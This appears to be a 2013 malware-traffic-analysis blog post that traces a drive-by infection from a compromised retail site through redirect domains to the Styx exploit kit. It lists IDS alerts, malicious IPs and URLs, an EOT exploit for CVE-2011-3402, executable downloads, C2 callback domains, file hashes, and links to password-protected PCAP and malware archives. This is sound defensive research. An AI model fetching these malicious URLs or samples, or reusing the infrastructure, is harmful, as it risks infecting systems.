2013-11-23 - CAPHAW DRIVEBY LEADS TO STYX EK
PCAP AND MALWARE:
- ZIP of the PCAP: 2013-11-23-Styx-EK-traffic.pcap.zip
- ZIP file of the malware: 2013-11-23-Styx-EK-malware.zip
NOTES:
Had some time this past Friday to infect a vulnerable Windows VM and study the infection chain. I found a site named www.perfumelover.co.uk which redirected to a Styx exploit kit. Clean MX Virus Watch shows URLs from this site infected with Troj/JSRedir-HP as early as 2013-08-28, while Scumware.org has URLs from this site as early as 2013-10-14.
McAfee Labs has a blog article on the Styx exploit kit, which you can read about here. The infection traffic looks similar to the image below, which I've modified slightly from that McAfee article:
Let's examine the infection traffic in more detail...
SNORT EVENTS
I used Security Onion to monitor a vulnerable Windows VM running Java 6 update 25. The infection traffic generated the following events in Sguil (all times GMT):
Screen shot of Sguil events for this infection.
- ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Statistic.js
- ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Ping.html
- ET CURRENT_EVENTS /Styx EK - /jorg.html
- ET CURRENT_EVENTS Styx EK - /jvvn.html
- ET CURRENT_EVENTS Unknown_gmf/Styx EK - fnts.html
- ET CURRENT_EVENTS Styx EK jply.html
- ET CURRENT_EVENTS Possible Java Applet JNLP applet_ssv_validated in Base64 2
- ET CURRENT_EVENTS Possible JavaFX Click To Run Bypass 2
- ET CURRENT_EVENTS DRIVEBY Blackhole - Landing Page Recieved - applet and flowbit
- ET CURRENT_EVENTS Styx Exploit Kit Landing Applet With Payload
- ET INFO EXE - Served Attached HTTP
- ET CURRENT_EVENTS Blackhole Exploit Kit Delivering Executable to Client
- ET TROJAN Suspicious Self Signed SSL Certificate to (MyCompany Ltd) likely Shylock CnC
INFECTION CHAIN OF EVENTS
ASSOCIATED DOMAINS
- 63.141.137.25 - www.perfumelover.co.uk - compromised website that channeled traffic to the exploit page
- 85.25.13.66 - pkktmkmnqxhgqbqmohlrv.peguards.cc - first in a series of redirects from the compromised website
- 85.25.13.66 - pkktmkmnqxhgqbqmohlrv.klr.su - second in a series of redirects from the compromised website
- 85.25.13.66 - sysinfo.su - third in a series of redirects from the compromised website
- 185.31.209.83 - diq.endpointcash.asia - Domain hosting Styx exploit kit that delivers the exploit and the malicious executable
INITIAL INFECTION CHAIN
- 23:55:11 - 192.168.204.134 port 50139 - 63.141.137.25 port 80 ( www.perfumelover.co.uk ) - GET /cartier-eau-de-cartier-essence-dorange-edt-100ml/
- 23:55:13 - 192.168.204.134 port 50167 - 85.25.13.66 port 80 ( pkktmkmnqxhgqbqmohlrv.peguards.cc ) - GET /9cfb37b8iq/get.js
- 23:55:15 - 192.168.204.134 port 50168 - 85.25.13.66 port 80 ( pkktmkmnqxhgqbqmohlrv.klr.su ) - GET /statistic.js?k=9cfb37b8iq&d=peguards.cc
- 23:55:18 - 192.168.204.134 port 50171 - 85.25.13.66 port 80 ( sysinfo.su ) - GET /ping.html?id=9cfb37b8iq&js=1&key=default
- 23:55:21 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /pu9C7E0Mw/[long string]/09PT0/
- 23:55:21 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/
- 23:55:21 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/jorg.html
- 23:55:22 - 192.168.204.134 port 50203 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/jvvn.html
- 23:55:22 - 192.168.204.134 port 50205 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/pliexp.html
- 23:55:22 - 192.168.204.134 port 50204 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/fnts.html
- 23:55:22 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/jply.html
- 23:55:23 - 192.168.204.134 port 50204 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/bhtntqlj.html
- 23:55:23 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/UPURxASzc.eot [CVE-2011-3402 Exploit]
- 23:55:24 - 192.168.204.134 port 50203 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/iexp.html
- 23:55:25 - 192.168.204.134 port 50205 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/ixlc.html
- 23:55:36 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /l26tm20/[long string]/l7xD5zhET9.exe?7F7x=5fa77&h=33 [Malicious executable]
NOTE: More traffic follows where Java exploits are sent from diq.endpointcash.asia, and the same malicious executable is delivered again. I've omitted those additional events in the above list, so we can focus on the first successful exploit.
POST INFECTION CALLBACK TRAFFIC
- 23:55:40 - 192.168.204.134 port 50213 - 69.163.43.175 port 443 - xr7zd1hr5cqn.kre.cc
- 23:55:43 - 192.168.204.134 port 50218 - 198.52.243.229 port 443 - 4wn6f3o.kre.cc
- 23:55:43 - 192.168.204.134 port 50220 - 198.52.243.229 port 443 - 59cptvob3.kre.cc
- 23:55:43 - 192.168.204.134 port 50219 - 181.41.193.168 port 443 - 21cqk542pejhmzqy.kre.cc
- 23:55:43 - 192.168.204.134 port 50221 - 198.52.243.229 port 443 - 4wn6f3o.kre.cc
- 23:55:43 - 192.168.204.134 port 50222 - 198.52.243.229 port 443 - 59cptvob3.kre.cc
- 23:55:43 - 192.168.204.134 port 50223 - 69.163.43.175 port 443 - cutjmnj0b.www5.kre.cc
- 23:55:43 - 192.168.204.134 port 50224 - 181.41.193.168 port 443 - xr7ygt7mk4enngh0.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50227 - 69.163.43.175 port 443 - cutjmnj0b.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50229 - 198.52.243.229 port 443 - uwablphuluq.kre.cc
- 23:55:44 - 192.168.204.134 port 50228 - 181.41.193.168 port 443 - 21cqk542pejhmzqy.kre.cc
- 23:55:44 - 192.168.204.134 port 50231 - 198.52.243.229 port 443 - uwablphuluq.kre.cc
- 23:55:44 - 192.168.204.134 port 50230 - 181.41.202.249 port 443 - 84c3gl.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50232 - 181.41.193.168 port 443 - xr7ygt7mk4enngh0.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50235 - 181.41.202.249 port 443 - 84c3gl.www5.kre.cc
- 23:55:45 - 192.168.204.134 port 50237 - 181.41.202.249 port 443 - jzgixx97hffu7c8k.kre.cc
- 23:55:45 - 192.168.204.134 port 50240 - 69.163.43.175 port 443 - 3fnd5y95x6nmmp7.kre.cc
- 23:55:45 - 192.168.204.134 port 50239 - 181.41.202.249 port 443 - jzgixx97hffu7c8k.kre.cc
- 23:55:46 - 192.168.204.134 port 50225 - 109.123.127.228 port 443 - xweie2.kre.cc
- 23:56:09 - 192.168.204.134 port 50273 - 181.41.202.249 port 443 - 81x8fi5p.www5.kre.cc
- 23:56:13 - 192.168.204.134 port 50289 - 109.123.127.228 port 443 - 1aw2nml.kre.cc
NOTE: In addition to kre.cc, other suffixes in the SSL callback traffic include bai.su, pfh.cc, rwn.cc, sgu.cc, and sxo.su.
INFECTION TRAFFIC DETAILS
IP address: 63.141.137.25 port 80
domain name: www.perfumelover.co.uk
HTTP request: GET /cartier-eau-de-cartier-essence-dorange-edt-100ml/
Sguil events: None
Screenshot of traffic:
In the HTML of the web page, we see javascript that leads to the next step in the infection chain:
The underlined portion shown is hexadecimal that translates to http://"+s1+".peguards.cc/9cfb37b8iq/get.js
where s1 is a variable prefix used with the domain name.
IP address: 85.25.13.66 port 80
domain name: pkktmkmnqxhgqbqmohlrv.peguards.cc
HTTP request: GET /9cfb37b8iq/get.js
Sguil events: None
Screenshot of traffic:
The hexadecimal script references the next link in the infection chain.
IP address: 85.25.13.66 port 80
domain name: pkktmkmnqxhgqbqmohlrv.klr.su
HTTP request: GET /statistic.js?k=9cfb37b8iq&d=peguards.cc
Sguil event: ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Statistic.js
Screenshot of traffic:
IP address: 85.25.13.66 port 80
domain name: sysinfo.su
HTTP request: GET /ping.html?id=9cfb37b8iq&js=1&key=default
Sguil event: ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Ping.html
Screenshot of traffic:
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP requests (the first returned a "302 found" that redirected to the second):
- GET /pu9C7E0Mw/h70J0a717s_WC14YC_R0bXe21/3ytY0q-BxO0kWj_t0XUD/606q8z0-EEmr0RJ-7o/09PT0/
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/
Sguil events: None
Screenshot of traffic:
This is the first page of the Styx exploit kit.
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP requests:
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/jorg.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/jvvn.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/fnts.html
Sguil events:
- ET CURRENT_EVENTS /Styx EK - /jorg.html
- ET CURRENT_EVENTS Styx EK - /jvvn.html
- ET CURRENT_EVENTS Unknown_gmf/Styx EK - fnts.html
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP request: GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/jply.html
Sguil events:
- ET CURRENT_EVENTS Styx EK jply.html
- ET CURRENT_EVENTS Possible Java Applet JNLP applet_ssv_validated in Base64 2
- ET CURRENT_EVENTS Possible JavaFX Click To Run Bypass 2
- ET CURRENT_EVENTS DRIVEBY Blackhole - Landing Page Recieved - applet and flowbit
- ET CURRENT_EVENTS Styx Exploit Kit Landing Applet With Payload
Screenshot of traffic:
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP requests:
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/pliexp.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/bhtntqlj.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/iexp.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/ixlc.html
Sguil events: None
NOTE: These are some of the other HTML pages delivered by this version of the Styx exploit kit. No updated signatures existed for these on Security Onion as of 2013-11-23.
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP request: GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/UPURxASzc.eot
Sguil events: None
Screenshot of traffic:
This EOT file is an exploit that targets CVE-2011-3402.
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP request: GET /l26tm20/IwGE-0LFSD0_XU9-x0GPGO0CeUj/008_Nf0FyT5-07FXi13X_Hy17_moB018/CS0/LTQ_Z0MK2_Y07UJ6/0O4n_v0KS4Q0BnlP_00AH00Ps-0I0/LgvY0J/BFN07DeE-0lCzM/11aU/t0OduV_0e_s4M13r/960gdFk_0Tnf5_0Rg_7x0wx-Ys0WA/dY0RY6_f04/IRu0svJE-0fr8L0V1/MS0L_fXJ0/8SIT-0zi-xO0-Xkic0ke_7o0t6-930luSJ0m_2Nm05AUO-07KZI0/GLA-s0/oMaE0_8uDw111M-J0ghng-0k1V-q0zsst0-H05E00/CFp/0rPut0g_9U_50bE8d0/CTe-g0RXv-R04MFA0/qcf00F-vrK/l7xD5zhET9.exe?7F7x=5fa77&h=33
Sguil events:
- ET INFO EXE - Served Attached HTTP
- ET CURRENT_EVENTS Blackhole Exploit Kit Delivering Executable to Client
Screenshot of traffic:
IP address: various on port 443
domain name: various
Sguil event: ET TROJAN Suspicious Self Signed SSL Certificate to (MyCompany Ltd) likely Shylock CnC
Screenshot of traffic:
Filtered in wireshark, so you can see the domain names listed for the SSL handshakes.
ADDITIONAL NOTES ON THE INFECTION TRAFFIC
As noted earlier, other exploits (Java-based) were sent, and the same malicious EXE was downloaded again. In the image below, I've highlighted the events that I didn't review in this blog entry:
Feel free to review the PCAP for more details on the extra infection traffic.
The malicious EXE appears to be some variation on Kazy or Kryptic, which is a Trojan downloader. However, I didn't notice any follow-up downloads on the Windows VM, so I executed the malicious EXE in the AppData\Local\Temp folder on a physical Windows machine. That returned another piece of malware, which I've included in the preliminary malware analysis below.
PRELIMINARY MALWARE ANALYSIS
EOT exploit from 185.31.209.83 port 80 (diq.endpointcash.asia):
https://www.virustotal.com/en/file/c9768dd18be40e8cc14e9a6c7eb0dad36c4dd600acbab5903970f2d3865a8347/analysis/
File name: cfb7461af2c378522efb4796ec2a96b8.eot File size: 4.2 KB ( 4331 bytes )
MD5 hash: cfb7461af2c378522efb4796ec2a96b8
Detection ratio: 4 / 47
First submitted: 2013-11-24 04:37:18 GMT (by me)
Malicious EXE from 185.31.209.83 port 80 (diq.endpointcash.asia):
https://www.virustotal.com/en/file/c9768dd18be40e8cc14e9a6c7eb0dad36c4dd600acbab5903970f2d3865a8347/analysis/
File name: 28452bd26e2145c12f6b24b36ca37d98.exe File size: 320.0 KB ( 327680 bytes )
MD5 hash: 28452bd26e2145c12f6b24b36ca37d98
Detection ratio: 10 / 47
First submitted: 2013-11-23 07:31:53 GMT (by me)
Second malicious EXE downloaded by the first EXE on 2013-11-23:
https://www.virustotal.com/en/file/2c88599470a2151739c3811d82caaeb6fd92785d99df47d571f34afaaf6145ee/analysis/
File name: 2f354eb035e12d467d8229858d381328.exe File size: 456.0 KB ( 466976 bytes )
MD5 hash: 2f354eb035e12d467d8229858d381328
Detection ratio: 4 / 47
First submitted: 2013-11-24 00:40:34 GMT (by me)
I also took the Java archives I saw in the VM's AppData\Local\Temp folder and submitted them to Virus Total.
- MD5: a1b81bc04f8bacd03c1bda59ceb2290f - Size: 11,299 bytes - Virus Total link
- MD5: 901769baa0480718ee8a97e66ee678b4 - Size: 11,299 bytes - Virus Total link
- MD5: 844dbb812117cffc0b845ff6d66f35b1 - Size: 11,302 bytes - Virus Total link
- MD5: 3af8065d3c46e44dee05dfc42f1ecfc9 - Size: 16,427 bytes - Virus Total link
- MD5: 063a2e4f7061c07bd24c6e85b1d441f5 - Size: 16,428 bytes - Virus Total link
Archive contents of the first Java exploit (the one at 11 KB or so):
Archive contents of the second Java exploit (the one at 16 KB or so):
FINAL NOTES
Once again, here are the associated files:
- ZIP of the PCAP: 2013-11-23-Styx-EK-traffic.pcap.zip
- ZIP file of the malware: 2013-11-23-Styx-EK-malware.zip
ZIP files are password-protected with the standard password. If you don't know it, look at the "about" page of this website.
Click here to return to the main page.